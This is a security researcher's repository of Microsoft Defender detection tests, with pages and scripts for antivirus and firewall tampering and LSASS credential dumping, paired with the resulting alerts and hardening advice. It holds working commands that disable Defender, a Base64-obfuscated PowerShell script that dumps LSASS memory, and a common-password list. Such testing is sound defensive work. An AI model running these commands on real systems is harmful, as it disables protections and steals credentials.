├── DEV
│   ├── DEV01-MDO-FileDetonation
│   │   ├── DEV01-Attachment-Type1.html
│   │   ├── DEV01-Attachment-Type2.html
│   │   ├── DEV01-Attachment-Type3.html
│   │   ├── README.md
│   │   ├── dev01-img-error.jpg
│   │   └── dev01-img-sea.jpg
│   ├── DEV02-AVtampering
│   │   └── Dev02-AVTampering.md
│   ├── DEV03-FirewallTampering
│   │   └── Dev03-FirewallTampering.md
│   ├── DEV04-LSASSdumping-MiniDump
│   │   ├── Dev04-LSASSdumping-MiniDump.md
│   │   └── Dev04Ninja.ps1
│   └── Repo
│       ├── Ninja_IOC_db.csv
│       ├── Payload1.ps1
│       └── common_password.txt
└── README.md
-------------------------------------------------------------------------------- /DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type1.html: --------------------------------------------------------------------------------
[HTML test attachment; the markup, stylesheet and script did not survive extraction. Title: "Login Form". Visible text: "Sign in"; "There was a problem with the login. Redirecting..."]
-------------------------------------------------------------------------------- /DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type2.html: --------------------------------------------------------------------------------
[HTML test attachment; the markup, stylesheet and script did not survive extraction. Title: "Download Page". Visible text: "Downloading..."; "If the download doesn't start, click here."]
-------------------------------------------------------------------------------- /DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type3.html: --------------------------------------------------------------------------------
[HTML test attachment; the markup, stylesheet and script did not survive extraction. Title and page heading: "Multiple Delayed Error Messages with Redirect". Visible text: "Download Text File".]
-------------------------------------------------------------------------------- /DEV/DEV01-MDO-FileDetonation/README.md: --------------------------------------------------------------------------------
# MDO Safe Attachments : File Detonation Validation
These are test files designed to exercise ***"File Detonation"*** and ***"Deep Analysis"*** of Safe Attachments in Microsoft Defender for Office 365.

> [!Important]
> For testing purposes, the EICAR test file URL is used as the redirection target in the HTML files. You can modify those lines and use an alternative link. However, it is strongly recommended to perform this testing exclusively within a controlled environment, for validation purposes only.

### Usage
1. Download one of the test HTML files.
   - [x] [DEV01-Attachment-Type1.html](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type1.html)
   - [x] [DEV01-Attachment-Type2.html](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type2.html)
   - [x] [DEV01-Attachment-Type3.html](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV01-MDO-FileDetonation/DEV01-Attachment-Type3.html)

2. Send an email with ***the HTML file*** attached to the test user.

### How the HTML file works
e.g. DEV01-Attachment-Type1.html
![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/d4a08f23-193d-4073-a06d-47dcb194468f)

### HTML file templates
![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/aeb12d13-b91e-476b-b168-dcd30f8ae6d5)

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
-------------------------------------------------------------------------------- /DEV/DEV01-MDO-FileDetonation/dev01-img-error.jpg: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LearningKijo/ResearchDev/d6f84e82ca19656c6270345f0d34b4619611584a/DEV/DEV01-MDO-FileDetonation/dev01-img-error.jpg
-------------------------------------------------------------------------------- /DEV/DEV01-MDO-FileDetonation/dev01-img-sea.jpg: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LearningKijo/ResearchDev/d6f84e82ca19656c6270345f0d34b4619611584a/DEV/DEV01-MDO-FileDetonation/dev01-img-sea.jpg
-------------------------------------------------------------------------------- /DEV/DEV02-AVtampering/Dev02-AVTampering.md: --------------------------------------------------------------------------------
# AV Tampering
Microsoft Defender for Endpoint provides protection against AV tampering, called **Tamper Protection**, which prevents attackers from modifying settings and disabling detection engines during defense evasion attempts. If Tamper Protection is enabled, AV tampering activities are blocked. Even if it is not enabled, AV tampering activities are still detected by Microsoft Defender for Endpoint.

On this page, I would like to showcase **some test methods** and demonstrate **the detection and alerting** capabilities of Microsoft Defender for Endpoint.
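Before running the Red Note tests below, and again after them, it helps to know exactly which of the settings they touch are in a tampered state on the device, and to have one way to put them back. The following PowerShell script is an added example, not code from the original page: it reads the same Defender preferences and policy-hive registry values that the test commands modify, also lists outbound block rules aimed at the Defender/MDE binaries used in the firewall tampering test on the DEV03 page further down, and reverts what it finds when run with `-Revert`. The finding/fix structure and the function names are this example's own; the cmdlets, registry paths, service and binary names are the ones the tests themselves use.

```powershell
# Added example (not part of the original page). Run in an elevated PowerShell session.
# Audits the settings changed by the AV tampering tests (Set-MpPreference, policy-hive
# registry values) and the outbound firewall rules from the DEV03 test, and reverts them
# with -Revert. With Tamper Protection on, the disable side of these tests is blocked, so
# an empty list is the expected result; anything listed is an un-reverted test or real tampering.
[CmdletBinding()]
param([switch]$Revert)

$PolicyRoot  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
$MdeBinaries = 'MsMpEng.exe', 'MsSense.exe', 'SenseCncProxy.exe'   # binaries the DEV03 rules target

function New-Finding([string]$Area, [string]$Item, $Value, $Fix) {
    # One row per tampered setting; Fix is a scriptblock that restores the protected state,
    # or $null when the setting cannot be changed locally (Tamper Protection itself).
    [pscustomobject]@{ Area = $Area; Item = $Item; Value = $Value; Fix = $Fix }
}

function Get-DefenderTamperFindings {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    if (-not $status.IsTamperProtected) {
        New-Finding 'AV' 'IsTamperProtected' 'off (turn on from Intune or the Defender portal)' $null
    }
    if ($pref.DisableRealtimeMonitoring) {
        New-Finding 'AV' 'DisableRealtimeMonitoring' $true { Set-MpPreference -DisableRealtimeMonitoring $false }
    }
    if ($pref.MAPSReporting -eq 0) {
        New-Finding 'AV' 'MAPSReporting' 0 { Set-MpPreference -MAPSReporting Advanced }
    }
    # GetNewClosure() freezes the loop variable so each Fix removes its own exclusion
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p) { New-Finding 'AV' 'ExclusionPath' $p ({ Remove-MpPreference -ExclusionPath $p }.GetNewClosure()) }
    }
    foreach ($e in @($pref.ExclusionExtension)) {
        if ($e) { New-Finding 'AV' 'ExclusionExtension' $e ({ Remove-MpPreference -ExclusionExtension $e }.GetNewClosure()) }
    }

    # Policy-hive values written by the New-ItemProperty / reg.exe variants of the test
    foreach ($c in @(
        @{ Key = "$PolicyRoot\Real-Time Protection"; Name = 'DisableRealtimeMonitoring' },
        @{ Key = "$PolicyRoot\Spynet";               Name = 'SpynetReporting' })) {
        $item = Get-ItemProperty -Path $c.Key -Name $c.Name -ErrorAction SilentlyContinue
        if ($null -ne $item) {
            $key = $c.Key; $name = $c.Name
            New-Finding 'Registry' "$key\$name" $item.$name ({ Remove-ItemProperty -Path $key -Name $name }.GetNewClosure())
        }
    }
    foreach ($sub in 'Extensions', 'Paths') {
        $key = "$PolicyRoot\Exclusions\$sub"
        if (Test-Path $key) {
            foreach ($name in ((Get-Item $key).GetValueNames() | Where-Object { $_ })) {
                $data = Get-ItemPropertyValue -Path $key -Name $name
                New-Finding 'Registry' "$key\$name" $data ({ Remove-ItemProperty -Path $key -Name $name }.GetNewClosure())
            }
        }
    }

    # Outbound block rules aimed at the Defender/MDE binaries or the WinDefend service
    foreach ($rule in Get-NetFirewallRule -Direction Outbound -Action Block -ErrorAction SilentlyContinue) {
        $program = ($rule | Get-NetFirewallApplicationFilter).Program
        $service = ($rule | Get-NetFirewallServiceFilter).Service
        if (($program -and ($MdeBinaries -contains (Split-Path $program -Leaf))) -or ($service -eq 'WinDefend')) {
            $ruleName = $rule.Name
            New-Finding 'Firewall' $ruleName ("$program $service".Trim()) ({ Remove-NetFirewallRule -Name $ruleName }.GetNewClosure())
        }
    }
}

$findings = @(Get-DefenderTamperFindings)
if (-not $findings) { 'No tampered Defender settings or blocking firewall rules found.' }
$findings | Format-Table Area, Item, Value -AutoSize

if ($Revert) {
    foreach ($f in $findings) {
        if (-not $f.Fix) { Write-Warning "$($f.Item) cannot be reverted locally"; continue }
        # A revert that fails is itself worth seeing, hence the try/catch
        try { & $f.Fix; "Reverted $($f.Area): $($f.Item)" }
        catch { Write-Warning "Could not revert $($f.Item): $_" }
    }
}
```

Run it once before the tests to confirm a clean baseline, once after to see what each test actually changed, and with `-Revert` to clean up the device; a firewall rule or registry value that survives a revert should be treated as a finding in its own right.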

## Red Note (test insights)
**PowerShell, Defender Cmdlet**
```powershell
# Disable real-time protection
Set-MpPreference -DisableRealtimeMonitoring $true
# Disable cloud-delivered protection
Set-MpPreference -MAPSReporting 0
# Modify exclusions - Extensions & Paths
Set-MpPreference -ExclusionExtension "ps1" -ExclusionPath "C:\"
```

**PowerShell, creating new registry values**
```powershell
# Disable real-time protection
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWord -Force
# Disable cloud-delivered protection
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name SpynetReporting -Value 0 -PropertyType DWord -Force
# Modify exclusions - Extensions & Paths
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" -Name "ps1" -Value 0 -PropertyType String -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -Name "C:\" -Value 0 -PropertyType String -Force
```
> [!Important]
> If the specified registry key doesn't exist, PowerShell returns an error, so please ensure that the key exists. If it doesn't, you can create it.
> e.g. if the Exclusions\Extensions key doesn't exist
> ```powershell
> New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" -Name 'Extensions' -Force -ErrorAction 0
> ```

**PowerShell, stop Defender Service & Process**
```powershell
Stop-Service -Name "WinDefend"
Stop-Process -Name "MsMpEng"
```
> [!Note]
> WinDefend (MsMpEng.exe) runs as a protected process, so these stop requests are denied even from an elevated session; the attempt is still visible to Microsoft Defender for Endpoint.

**Windows commands, creating new registry values**
```cmd
rem Disable real-time protection
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
rem Disable cloud-delivered protection
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
rem Modify exclusions - Extensions & Paths
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "ps1" /t REG_SZ /d 0 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\" /t REG_DWORD /d 0 /reg:64
```

**Windows commands, stop Defender Service (sc / net)**
```cmd
sc stop WinDefend
net stop WinDefend
```

## Alerts & Detections
Here are the alerts raised by Microsoft Defender for Endpoint and Microsoft Defender Antivirus.
These alerts originated from the PowerShell and CMD commands above.

- [x] Suspicious Microsoft Defender Antivirus exclusion
- [x] Attempt to turn off Microsoft Defender Antivirus protection
- [x] An active 'MpTamperSrvDisableAV' malware was prevented from executing via AMSI
- [x] An active 'MpTamperSrvDisableAV' malware in a command line was prevented from executing
- [x] Microsoft Defender Antivirus protection turned off
- [x] Microsoft Defender Antivirus tampering

![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/4cc90ed3-6672-421b-84c0-4b8fb6e6b4f6)

**Detecting potential tampering activity in the Microsoft Defender portal**

When tampering is detected, an alert is raised. Some of the alert titles for tampering, taken from [Tamper resiliency](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/tamper-resiliency?view=o365-worldwide), are:
```
- Attempt to bypass Microsoft Defender for Endpoint client protection
- Attempt to stop Microsoft Defender for Endpoint sensor
- Attempt to tamper with Microsoft Defender on multiple devices
- Attempt to turn off Microsoft Defender Antivirus protection
- Defender detection bypass
- Driver-based tampering attempt blocked
- Image file execution options set for tampering purposes
- Microsoft Defender Antivirus protection turned off
- Microsoft Defender Antivirus tampering
- Modification attempt in Microsoft Defender Antivirus exclusion list
- Pending file operations mechanism abused for tampering purposes
- Possible Antimalware Scan Interface (AMSI) tampering
- Possible remote tampering
- Possible sensor tampering in memory
- Potential attempt to tamper with MDE via drivers
- Security software tampering
- Suspicious Microsoft Defender Antivirus exclusion
- Tamper protection bypass
- Tampering activity typical to ransomware attacks
- Tampering with Microsoft Defender for Endpoint sensor communication
- Tampering with Microsoft Defender for Endpoint sensor settings
- Tampering with the Microsoft Defender for Endpoint sensor
```

## Blue Note
- Turn on [Microsoft Defender Antivirus](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/next-generation-protection?view=o365-worldwide) (including Real-Time Protection, Cloud Protection, Sample Submission and so on)
- Onboard devices to [Microsoft Defender for Endpoint](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide)
- Turn on Microsoft Defender for Endpoint [Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide&ocid=magicti_ta_learndoc)

## Reference
- [Current limits of Defender AV Tamper Protection](https://cloudbrothers.info/current-limits-defender-av-tamper-protection/)
- [Make sure Tamper Protection is turned on](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/make-sure-tamper-protection-is-turned-on/ba-p/2695568)
- [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](https://www.microsoft.com/en-us/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/)
- [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](https://www.microsoft.com/en-us/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/)

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
-------------------------------------------------------------------------------- /DEV/DEV03-FirewallTampering/Dev03-FirewallTampering.md: --------------------------------------------------------------------------------
# Firewall Tampering, Blocking EDR/AV communication
Microsoft Defender Antivirus detects and **prevents tampering** through the creation of firewall rules that block the communication of Microsoft Defender for Endpoint and Microsoft Defender Antivirus.

## Red Note (test insights)
**[Bypassing Defender EDR using Windows Firewall - mitigations](https://write-verbose.com/2022/05/31/EDRBypass/)**
```powershell
New-NetFirewallRule -DisplayName "Block 443 MsMpEng" -Name "Block 443 MsMpEng" -Direction Outbound -Service WinDefend -Enabled True -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 SenseCncProxy" -Name "Block 443 SenseCncProxy" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 MsSense" -Name "Block 443 MsSense" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" -RemotePort 443 -Protocol TCP -Action Block
```

## Alerts & Detections
After running the test, Microsoft Defender Antivirus raised these alerts.

- [x] An active 'MpTamperBlockNewFirewall' malware was prevented from executing via AMSI
- [x] An active 'DefenderFirewallTamper' malware in a command line was prevented from executing
- [x] Suspicious 'WDBlockFirewallRule' behavior was blocked

![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/7d86f078-852b-482b-bd4d-51c4b79c467d)

![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/1dd25ae9-0f60-4391-93a1-a5b3b1bc3118)

## Blue Note
Since firewall tampering activities are detected and prevented by the antivirus, please ensure that these configurations are properly implemented.
- Turn on [Microsoft Defender Antivirus](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/next-generation-protection?view=o365-worldwide) (including Real-Time Protection, Cloud Protection, Sample Submission and so on)
- Onboard devices to [Microsoft Defender for Endpoint](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide)
- Turn on Microsoft Defender for Endpoint [Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide&ocid=magicti_ta_learndoc)

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
-------------------------------------------------------------------------------- /DEV/DEV04-LSASSdumping-MiniDump/Dev04-LSASSdumping-MiniDump.md: --------------------------------------------------------------------------------
# LSASS dumping, MiniDump
Attackers target LSASS to grab the credential material held in its memory.
After a user logs in, LSASS caches credential material that an attacker can steal and reuse to move laterally through the environment under that user's identity.

Microsoft Defender for Endpoint and Defender Antivirus effectively prevent and detect LSASS dumping activities.
Here I'd like to demonstrate the detection side: ***capturing all activities and correlating multiple alerts into a single incident***.

## Red Note (test insights)
**PowerShell, LSASS credential dumping, built-in Windows tool**
```powershell
$lsassPID = (Get-Process -Name lsass).Id
cmd.exe /C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPID C:\temp\out.dmp full"
```

**Attack Script**
- [x] Download [a script](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV04-LSASSdumping-MiniDump/Dev04Ninja.ps1) ↓

```powershell
# Disable Microsoft Defender Antivirus
Set-MpPreference -DisableRealtimeMonitoring $true -ExclusionPath "C:\" -DisableBlockAtFirstSeen $true -DisableEmailScanning $true -DisableScriptScanning $true -ExclusionExtension "exe"

# Create "C:\temp" for the dump file
$tempDir = "C:\temp"
if (-not (Test-Path $tempDir -PathType Container)) {
    New-Item -Path $tempDir -ItemType Directory
}

# Wait for 10 seconds
Start-Sleep -Seconds 10

# LSASS dumping using the built-in Windows tool; the Base64 (UTF-16LE) payload decodes to the same two lines shown above
powershell.exe -e JABsAHMAYQBzAHMAUABJAEQAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABsAHMAYQBzAHMAKQAuAEkAZAANAAoAYwBtAGQALgBlAHgAZQAgAC8AQwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbwBtAHMAdgBjAHMALgBkAGwAbAAsACAATQBpAG4AaQBEAHUAbQBwACAAJABsAHMAYQBzAHMAUABJAEQAIABDADoAXAB0AGUAbQBwAFwAbwB1AHQALgBkAG0AcAAgAGYAdQBsAGwAIgA=
```
> [!Note]
> This script performs the following actions:
> 1. Disable Microsoft Defender Antivirus
> 2. Create "C:\temp" for the dump file
> 3. Dump LSASS using the built-in Windows tool (Base64-encoded command line)
>
> Make sure that [MDE Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide&ocid=magicti_ta_learndoc) is disabled for this test; with it enabled, the `Set-MpPreference` changes in step 1 are blocked.

## Alerts & Detections
After running the script, these alerts were generated and correlated into a single incident in the Microsoft Defender XDR portal.
- [x] Suspicious PowerShell command line
- [x] Sensitive credential memory read
- [x] Suspicious process executed PowerShell command
- [x] Suspicious access to LSASS service
- [x] Process memory dump
- [x] Suspicious Process Discovery
- [x] Suspicious Microsoft Defender Antivirus exclusion
- [x] Attempt to turn off Microsoft Defender Antivirus protection

![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/b7f1dc16-ac2a-4032-9f77-fd1cd1074318)

![image](https://github.com/LearningKijo/ResearchDev/assets/120234772/98f5cf84-59e7-46ee-a9ad-58434efedd83)

## Blue Note
- Turn on [Microsoft Defender Antivirus](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/next-generation-protection?view=o365-worldwide) (including Real-Time Protection, Cloud Protection, Sample Submission and so on)
- Enable the ASR rule [Block credential stealing from the Windows local security authority subsystem](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem)
- Onboard devices to [Microsoft Defender for Endpoint](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide)
- Turn on Microsoft Defender for Endpoint [Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide&ocid=magicti_ta_learndoc)

Windows administrators can also do the following to further harden the LSASS process on their devices:
- Enable [PPL for the LSASS process](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#BKMK_HowToConfigure); note that for new, enterprise-joined Windows 11 installs (22H2 update), this is already enabled by default
- Enable [Windows Defender Credential Guard](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure?tabs=intune#enable-windows-defender-credential-guard); this is also now enabled by default for organizations using the Enterprise edition of Windows 11
- Enable [restricted admin mode](https://learn.microsoft.com/en-us/archive/blogs/kfalde/restricted-admin-mode-for-rdp-in-windows-7-2008-r2) for Remote Desktop Protocol (RDP)
- Disable [“UseLogonCredential” in WDigest](https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649)

## Reference
- [OS Credential Dumping: LSASS Memory, T1003.001](https://attack.mitre.org/techniques/T1003/001/)
- [Detecting and preventing LSASS credential dumping attacks](https://www.microsoft.com/en-us/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/)

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
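The Blue Note and the hardening list on this page amount to a checklist. The following PowerShell function is an added example, not code from the original page: it checks each item on the local device and reports which are not in place, so it can be run before and after the Red Note test. The registry locations, the ASR rule GUID `9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2` (Block credential stealing from the Windows local security authority subsystem) and the `Win32_DeviceGuard` CIM class are the documented places these settings live; the function and property names are this example's own.

```powershell
# Added example (not part of the original page). Run elevated.
# Reports the state of every control in the Blue Note / hardening list above.
function Get-LsassHardeningReport {
    $lsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $wdigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $asrLsass   = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'   # ASR: Block credential stealing from LSASS

    function Get-RegDword([string]$Path, [string]$Name) {
        # $null when the value (or key) is absent, so callers can tell "unset" from 0
        try { [int](Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
    }

    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # ASR rules are two parallel arrays, Ids and Actions (1 = Block, 2 = Audit, 6 = Warn, 0 = Off)
    $ids   = @($pref.AttackSurfaceReductionRules_Ids | ForEach-Object { "$_".ToLower() })
    $idx   = [array]::IndexOf($ids, $asrLsass)
    $asrOn = ($idx -ge 0) -and ([int]$pref.AttackSurfaceReductionRules_Actions[$idx] -eq 1)

    # Credential Guard reports through DeviceGuard: SecurityServicesRunning contains 1 when it is active
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))

    $runAsPpl        = Get-RegDword $lsaKey 'RunAsPPL'                  # 1 = on (UEFI-locked), 2 = on (no UEFI lock)
    $restrictedAdmin = Get-RegDword $lsaKey 'DisableRestrictedAdmin'    # 0 = Restricted Admin RDP enabled; absent = disabled
    $wdigestCred     = Get-RegDword $wdigestKey 'UseLogonCredential'    # 1 = plaintext caching on; 0 or absent = off on current Windows

    [pscustomobject]@{
        RealTimeProtection = [bool]$status.RealTimeProtectionEnabled
        TamperProtection   = [bool]$status.IsTamperProtected
        AsrLsassBlock      = $asrOn
        LsassPPL           = ($runAsPpl -in @(1, 2))
        CredentialGuard    = $credGuard
        RestrictedAdminRDP = ($restrictedAdmin -eq 0)
        WDigestCachingOff  = ($wdigestCred -ne 1)
    }
}

$report = Get-LsassHardeningReport
$report | Format-List
$missing = @($report.PSObject.Properties | Where-Object { -not $_.Value } | ForEach-Object Name)
if ($missing) { Write-Warning ("Not in place: " + ($missing -join ', ')) }
```

Every property is a plain boolean so the report can be collected from many devices and compared; `WDigestCachingOff` treats an absent value as off because that is the default on supported Windows versions, but setting `UseLogonCredential` to 0 explicitly, as the list above recommends, removes the dependency on that default.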

-------------------------------------------------------------------------------- /DEV/DEV04-LSASSdumping-MiniDump/Dev04Ninja.ps1: --------------------------------------------------------------------------------
Set-MpPreference -DisableRealtimeMonitoring $true -ExclusionPath "C:\" -DisableBlockAtFirstSeen $true -DisableEmailScanning $true -DisableScriptScanning $true -ExclusionExtension "exe"

$tempDir = "C:\temp"

if (-not (Test-Path $tempDir -PathType Container)) {
    New-Item -Path $tempDir -ItemType Directory
}

Start-Sleep -Seconds 10

powershell.exe -e JABsAHMAYQBzAHMAUABJAEQAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABsAHMAYQBzAHMAKQAuAEkAZAANAAoAYwBtAGQALgBlAHgAZQAgAC8AQwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbwBtAHMAdgBjAHMALgBkAGwAbAAsACAATQBpAG4AaQBEAHUAbQBwACAAJABsAHMAYQBzAHMAUABJAEQAIABDADoAXAB0AGUAbQBwAFwAbwB1AHQALgBkAG0AcAAgAGYAdQBsAGwAIgA=
-------------------------------------------------------------------------------- /DEV/Repo/Ninja_IOC_db.csv: --------------------------------------------------------------------------------
Type,Artifact,First Seen,Last Seen,Source
hash_md5,KIJO5F10F7F27F98BE30959D9711,6/3/2024 12:00,6/3/2024 12:34,Defender TI
hash_sha1,KIJOFC60899C6D0468ADE1ABD8E66BDF2ED4,5/18/2021 11:50,8/23/2023 11:29,Defender TI
hash_sha1,KIJOFC781887FD0579044BBF783E6C408EB0EE,5/19/2021 15:38,8/23/2023 12:02,Defender TI
hash_sha256,KIJOFFE5BD1B210588268208AD89C3D5FCF9DE0E9,10/23/2024 13:06,12/26/2024 2:15,Defender TI
hash_sha256,KIJOFFF47788BBE2A6F84C5211EAD0FB0E76E2F7D9C312A,10/23/2024 13:06,12/23/2024 1:50,Defender TI
domain,ninja-gov.cloud,10/23/2024 14:02,10/28/2024 22:08,Defender TI
domain,ninja-trust.solutions,10/23/2024 11:17,1/19/2025 7:23,Defender TI
domain,xinzhantong,10/23/2024 11:17,1/19/2025 7:23,TechConnect
-------------------------------------------------------------------------------- /DEV/Repo/Payload1.ps1: --------------------------------------------------------------------------------
# Set-MpPreference -DisableRealtimeMonitoring $true -ExclusionPath "C:\" -DisableBlockAtFirstSeen $true -DisableEmailScanning $true -DisableScriptScanning $true -ExclusionExtension "exe"

$tempDir = "C:\temp"

if (-not (Test-Path $tempDir -PathType Container)) {
    New-Item -Path $tempDir -ItemType Directory
}

Start-Sleep -Seconds 10

powershell.exe -e JABsAHMAYQBzAHMAUABJAEQAIAA9ACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABsAHMAYQBzAHMAKQAuAEkAZAANAAoAYwBtAGQALgBlAHgAZQAgAC8AQwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbwBtAHMAdgBjAHMALgBkAGwAbAAsACAATQBpAG4AaQBEAHUAbQBwACAAJABsAHMAYQBzAHMAUABJAEQAIABDADoAXAB0AGUAbQBwAFwAbwB1AHQALgBkAG0AcAAgAGYAdQBsAGwAIgA=
-------------------------------------------------------------------------------- /DEV/Repo/common_password.txt: --------------------------------------------------------------------------------
123456
password
12345
123456789
qwerty
abc123
111111
123123
1q2w3e4r
admin
letmein
welcome
monkey
1234
password1
123qwe
sunshine
qwerty123
123321
123
iloveyou
123abc
password123
1qaz2wsx
1234qwer
trustno1
qwertyuiop
1password
123123123
abcdef
11111111
123r4t5y
dragon
12300
welcome123
changeme
qwerty1
qazwsx
superman
baseball
letmein123
monkey123
sunshine1
dragon123
passw0rd
iloveyou1
starwars
password1!
1234abcd
qwerty12
admin123
qwertyabc
qwertz
654321
secret
123123123123
abcdef1234
1qazxsw2
qazwsx123
adminadmin
112233
abcdefg
asdfghjkl
letmein1
root
555555
12345qwert
password1234
qazxswedc
test1234
121212
1password1
hello123
1234abc!
11223344
1qaz2wsx3edc
abc12345
mypassword
summer
1qaz2wsx!QAZ
111222
admin1234
football
qazwsxedc
sunshine123
passwordqwert
123321321
prince
adminadmin1
password1!
letmein123!
passwordqwerty
1234!qwert
123qwerty123
trustno1!
password12
12345!qwert
gfhjkl
starwars123
qwerty12345
123qwerty!
qwertyuiop1
admin12345
123!qwerty
passwordqwerty1
abc1234
dragon!123
passwordabc
mypassword1
qwerty!@#
monkey!123
welcome1234
1234abc123
123qwerty123!
password1abc
123password!
qwertyabc123
1q2w3e4r5t
qwertyqwerty
dragon1234
abc123!@#
superman123
1111qwerty
password12345
12345678!
1234qwerty123
qazwsx!123
qwertyabc!123
letmein!123
summer123
qwerty!1
12345!abc
monkeyabc
password1234!
passwordqwerty123
abc123qwerty
987654321
password01
trustno!1
